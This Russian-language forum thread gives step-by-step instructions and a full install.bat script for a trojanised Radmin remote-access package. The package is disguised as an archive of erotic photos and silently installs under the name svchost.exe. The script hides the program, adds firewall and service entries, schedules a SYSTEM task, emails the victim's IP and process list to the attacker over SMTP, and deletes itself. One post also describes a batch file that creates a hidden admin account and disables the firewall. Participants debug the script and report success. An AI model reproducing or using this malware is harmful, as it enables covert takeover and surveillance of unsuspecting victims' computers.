kim78 Женат |
13-01-2011 - 00:57 Привет всем. Вот здесь сборка радмин. Когда скачаете файлик-он будет рар расширения. В нем есть install.bat этот файлик нужно вытащить из архива, клацнуть правой клавишей и из контекстного меню выбрать "Изменить". Перед этим создать на рамблере два почтовых ящика (с одного на другой к вам будут приходить отчеты с IP адресами жертв). Имея ящики отредактировать install.bat как показано на рисунке Хостинг фотографий Потом этот install.bat кидаем обратно в архив, добавляем в него , например, фотки и обзываем его типа "Наши эро фото" и т.д. Зависит от фантазии. А расширение архива ОБЯЗАТЕЛЬНО делаем ".ЕХЕ". Когда жертва откроет архив-он у нее автоматически распакуется там где он лежит. Скрыто установится радмин, который нигде не виден в трее и в процессах. Потом автоматом удалятся все файлы установки. Останутся только те файлы или фото, которые вы на ваш вкус добавили в архив. Потом либо по почте узнаем ай пи жертвы, либо просто сканим свою сетку Нетсканом , предварительно настоим его на поиск открытых портов 4899 . У ваших жертв на вход по радмину будет стоять пароль 789456123 . Также вам могут повстречаться адреса со стандартными паролями: 12345678, 123456789, 11111111, 111111111. Удачи. ВНИМАНИЕ: Иногда некоторыми антивирусами палится, но очень редко. Частенько Авастом. Если надо-могу еще беспарольный радмин кинуть Это сообщение отредактировал kim78 - 13-01-2011 - 01:39 |
||||||||
kim78 Женат |
13-01-2011 - 01:16
Вот тут скачаешь батник, который расшаривает диски, включает службу телнет, отключает брандмаузер виндовс, создает скрытого пользователя с правами админа и потом сам удаляется Пользователь: login, пароль: pass. Кидаешь этот батник в архив как показано на рисунках Хостинг фото Всего фото: 2 Получится архив с расширением .ЕХЕ . Не запускай его, а поменяй расширение на rar, потом открой и добавь какие хочешь файлы. Потом обратно закрой и смени архив на .ЕХЕ. Готово |
||||||||
impala__ Свободен |
13-01-2011 - 15:05
Показывает что в файле вирус. Когда закачал файла инстал.бат в папке нет... |
||||||||
kim78 Женат |
13-01-2011 - 15:55 Ато уже антивирусник позаботился. Кстати, какой? Если не секрет. Попробуй отключить на время антивирус и зикачать снова. Вирусов там точно нет. Тем более архив rar расширения-даже случайно его у себя не запустишь. |
||||||||
sypord Свободен |
13-01-2011 - 19:05
Чето не то, архив запрашивает разрешения на распаковку, а если запаковать сам батник, его не запускает, а просто извлекает... |
||||||||
impala__ Свободен |
13-01-2011 - 19:15
У меня касперский стоит лицензионный |
||||||||
sypord Свободен |
13-01-2011 - 21:16
архивировать тока батник? |
||||||||
kim78 Женат |
13-01-2011 - 22:15
Читай выше внимательно. Батник, после изменения, вставляешь обратно в архив. А потом в архиве поменять расширение на .ЕХЕ . Тогда не будет спрашивать разрешения на распаковку, а просто автоматом распакует все что там есть, установит радмин и удалит файлы установки. |
||||||||
sypord Свободен |
13-01-2011 - 22:16
а мона так сделать чтобы этот батник еще и ip скидывал? проблема с улавливанием оного... |
||||||||
kim78 Женат |
13-01-2011 - 22:22
Не, проще радмин кидануть. Там как раз есть такая функция. Это сообщение отредактировал kim78 - 14-01-2011 - 04:40 |
||||||||
sypord Свободен |
14-01-2011 - 18:08
А можно сделать чтобы радмин устанавливался сразу при открытии письма? |
||||||||
sypord Свободен |
15-01-2011 - 18:56
Проверте плиз что тут нитак, cmdow @ /HID copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe" copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib" copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll" copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f reg import 1.reg regedit /s 1.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start %SYSTEMROOT%/system32/blat.exe -install -server smtp.rambler.ru -port 587 -f [email protected] -u isart6 systemap -pw fentezi8 ipconfig /all > %systemroot%/system32/ip.txt -to [email protected] tasklist > %systemroot%/system32/task.txt [email protected] blat.exe %systemroot%/system32/ip.txt -to @rambler.ru blat.exe %systemroot%/system32/task.txt -to @rambler.ru schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat del cmdow.exe del blat.exe тут была картинка del blat.lib del blat.dll del raddrv.dll del admdll.dll del svchost.exe del 1.reg del install.bat del install.bat |
||||||||
fox411 Свободен |
17-01-2011 - 14:36 есть кто пользуется клавиатурными шпионами? |
||||||||
albomy Свободен |
17-01-2011 - 22:27 Вопрос к kim78: будет ли работать сборочка радмина через инет. У жертвы ADSL соединение? |
||||||||
kim78 Женат |
17-01-2011 - 22:50
Будет. Но только если у жертвы реальный ip. |
||||||||
albomy Свободен |
17-01-2011 - 23:35 Точно не скажу. скоре всего динамический. Как узнать? и как сделать реальный IP? |
||||||||
albomy Свободен |
18-01-2011 - 00:17 относительно ip вопрос снят - динамический. Вопрос: поключены я и жертва к одному провайдеру через АДСЛ, возможно ли установить прогу какую-нибудь, что бы при каждом подключении жертвы отстукивала его ip мне на мыло? |
||||||||
kim78 Женат |
18-01-2011 - 03:08 По ай пи: даже если он динамический для нета, все равно в локалке он скорее всего другой, но реальный. Т.е. не надо будет даже в нет входить. Если у вас один пров, посмотри в своих настройках-есть ли у тебя ай пи, или он назначается автоматом. Теперь по пересылке: в нете поищи, либо спрячь где-нибудь саму сборку радмина и создай на нее ярлык, который можно будет поместить в автозагрузку. Каждый раз при включении будет заново устанавливаться радмин и присылать тебе на почту ай пи. А вообще, по моему опыту, когда ай пи динамический-у него не такой уж большой разброс присваиваемых новых адресов, можно и отсканить. |
||||||||
impala__ Свободен |
18-01-2011 - 17:27
Вроде все сделал как написано, а ай-пишник не отправляется. А выяснять точный ай-пи - это одна из главных проблем. Файлы архива после распаковки удаляются не сразу, а немного подумав, жертва будет явно удивлена. К тому же антивирус палит файл инстал.бат просто мрачно... Вроде идея хорошая, но че-то не доработано похоже... Подскажите если не трудно, почему может ай-пишник на ящик не отправляться? В файле прописываю вначале один ящик с паролем, затем ниже адрес второго ящика, все как написано, реакции ноль... |
||||||||
sypord Свободен |
18-01-2011 - 18:02 kim78, плиз помогите, ваш радмин не скидывает ip. исходник install.bat с изменениями выложил выше... |
||||||||
kim78 Женат |
18-01-2011 - 18:20 Вот. Замените "ВАШ_НИК1" на ник в первом ящике, с которого будут отправляться айпишники. И "ВАШ_НИК2-ник второго яшика, на который будут приходить айпишники. И вместо "ПАРОЛЬ" поставьте пароль для входа на первый ящик. ВНИМАТЕЛЬНО, просто замените, ничего не добавляя и ничего не меняя. ВОТ САМ ИНСТАЛЬНИК. Там тоже самое, в нем и вставляйте. cmdow @ /HID copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe" copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib" copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll" copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f reg import 1.reg regedit /s 1.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start %SYSTEMROOT%/system32/blat.exe -install -server smtp.rambler.ru -port 587 -f ВАШ_НИК[email protected] -u ВАШ_НИК1 -pw ПАРОЛЬ ipconfig /all > %systemroot%/system32/ip.txt tasklist > %systemroot%/system32/task.txt blat.exe %systemroot%/system32/ip.txt -to ВАШ_НИК[email protected] blat.exe %systemroot%/system32/task.txt -to ВАШ_НИК[email protected] schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat del cmdow.exe del blat.exe del blat.lib del blat.dll del raddrv.dll del admdll.dll del svchost.exe del 1.reg del install.bat del install.bat Это сообщение отредактировал kim78 - 18-01-2011 - 18:27 |
||||||||
Дмитриж Свободен |
18-01-2011 - 18:32 kim78 а что можно удалить из mult_agent где лежит инстал.батник, чтобы изменить этот батник и запустить у себя на компе, чтоб проверить приходят ли IP адреса на ящики в рамблере.? |
||||||||
Cox69lraC Свободен |
18-01-2011 - 19:53 все пока работает, все Супер!!!!!!!!!! |
||||||||
sypord Свободен |
18-01-2011 - 21:42
Большое спасибо, ща проверим... |
||||||||
kim78 Женат |
18-01-2011 - 22:01
Удали временно фаил svchost.exe. Это и есть сам радмин. Потом нужно будет его обратно в архив кинуть, перед тем как кому-то давать. |
||||||||
sypord Свободен |
18-01-2011 - 22:23
куда вам можно скинуть исправленный файл для проверки? |
||||||||
sypord Свободен |
18-01-2011 - 23:35
Я сделал все как написано, и ничего... Я скоро повешаюсь... |
||||||||
Дмитриж Свободен |
19-01-2011 - 12:27
Всё ок. Батник работает IP приходят, даже полный отчет по всем IP установленым на компе приходит, и отчет процессов запущенных тоже приходит, только вот смысл в нем какой? Всё хорошо теперь не получается чтоб инстал.Батник сам после распаковки запускался, может чтот ни так делаю, поясните пожалуйста.... |
||||||||
kim78 Женат |
19-01-2011 - 13:23
А ты расширение архива на .ЕХЕ поменял? |
||||||||
Дмитриж Свободен |
19-01-2011 - 17:44
Да конечно поменял на EXE. Вот что я сделал: 1. Разархивировал ваш mult_agent.rar 2. Поменял в нем Ваш install.bat на Свой install.bat 3. Вставил туда ещё пикантную фотку....))) 4. Эту папку сделал архивом mult_agent.rar (Правой кнопкой Добавить в архив...) 5. Затем mult_agent.rar поменял на EXE и получил: mult_agent.exe только вот потом mult_agent.exe стал напоминать своим видом-ярлыком install.bat, а точнее svchost.exe . И mult_agent.exe не раскрывается, хотя как он раскроется он же exe-й...))) В общем что тут не правильно,где я допустил ошибку? Спасибо!!! |
||||||||
kim78 Женат |
19-01-2011 - 18:25
Еще раз повторяю: внимательно читайте. Не надо mult_agent.rar разархивировать. Просто открыть, вытащить оттуда install.bat, исправить его и кинуть обратно. Фоток туда можно добавлять сколько угодно. Тольно НЕ СОЗДАЕМ НОВЫЙ АРХИВ. Затем меняем расширение на .ЕХЕ и все, готово. |
||||||||
Дмитриж Свободен |
19-01-2011 - 20:44
Вот балбес ни так Вас понял, надо было открыть архив, а не распаковывать((( Всё спасибо большое, теперь я разобрался всё работает, только вот есть задержка при удалении всех тех файлов внутри архива которые должны удаляться, я попытался их сделать скрытыми всё также работает батник запускается, но вот файлы не удаляются. В принципе если у жертвы выключен скрытный режим то файлы не видно, но что делать если он включен, да и вообще хотелось чтоб файлы всё равно удалились... ВОПРОС: что нужно прописать в инстал.батнике чтоб он удалял эти скрытые файлы??? И ещё отчёт на рамблер приходит в виде каких-то иероглифах ни что не понятно, разбираюсь только по цифрам... |
||||||||
sypord Свободен |
19-01-2011 - 21:32 заработало!!! |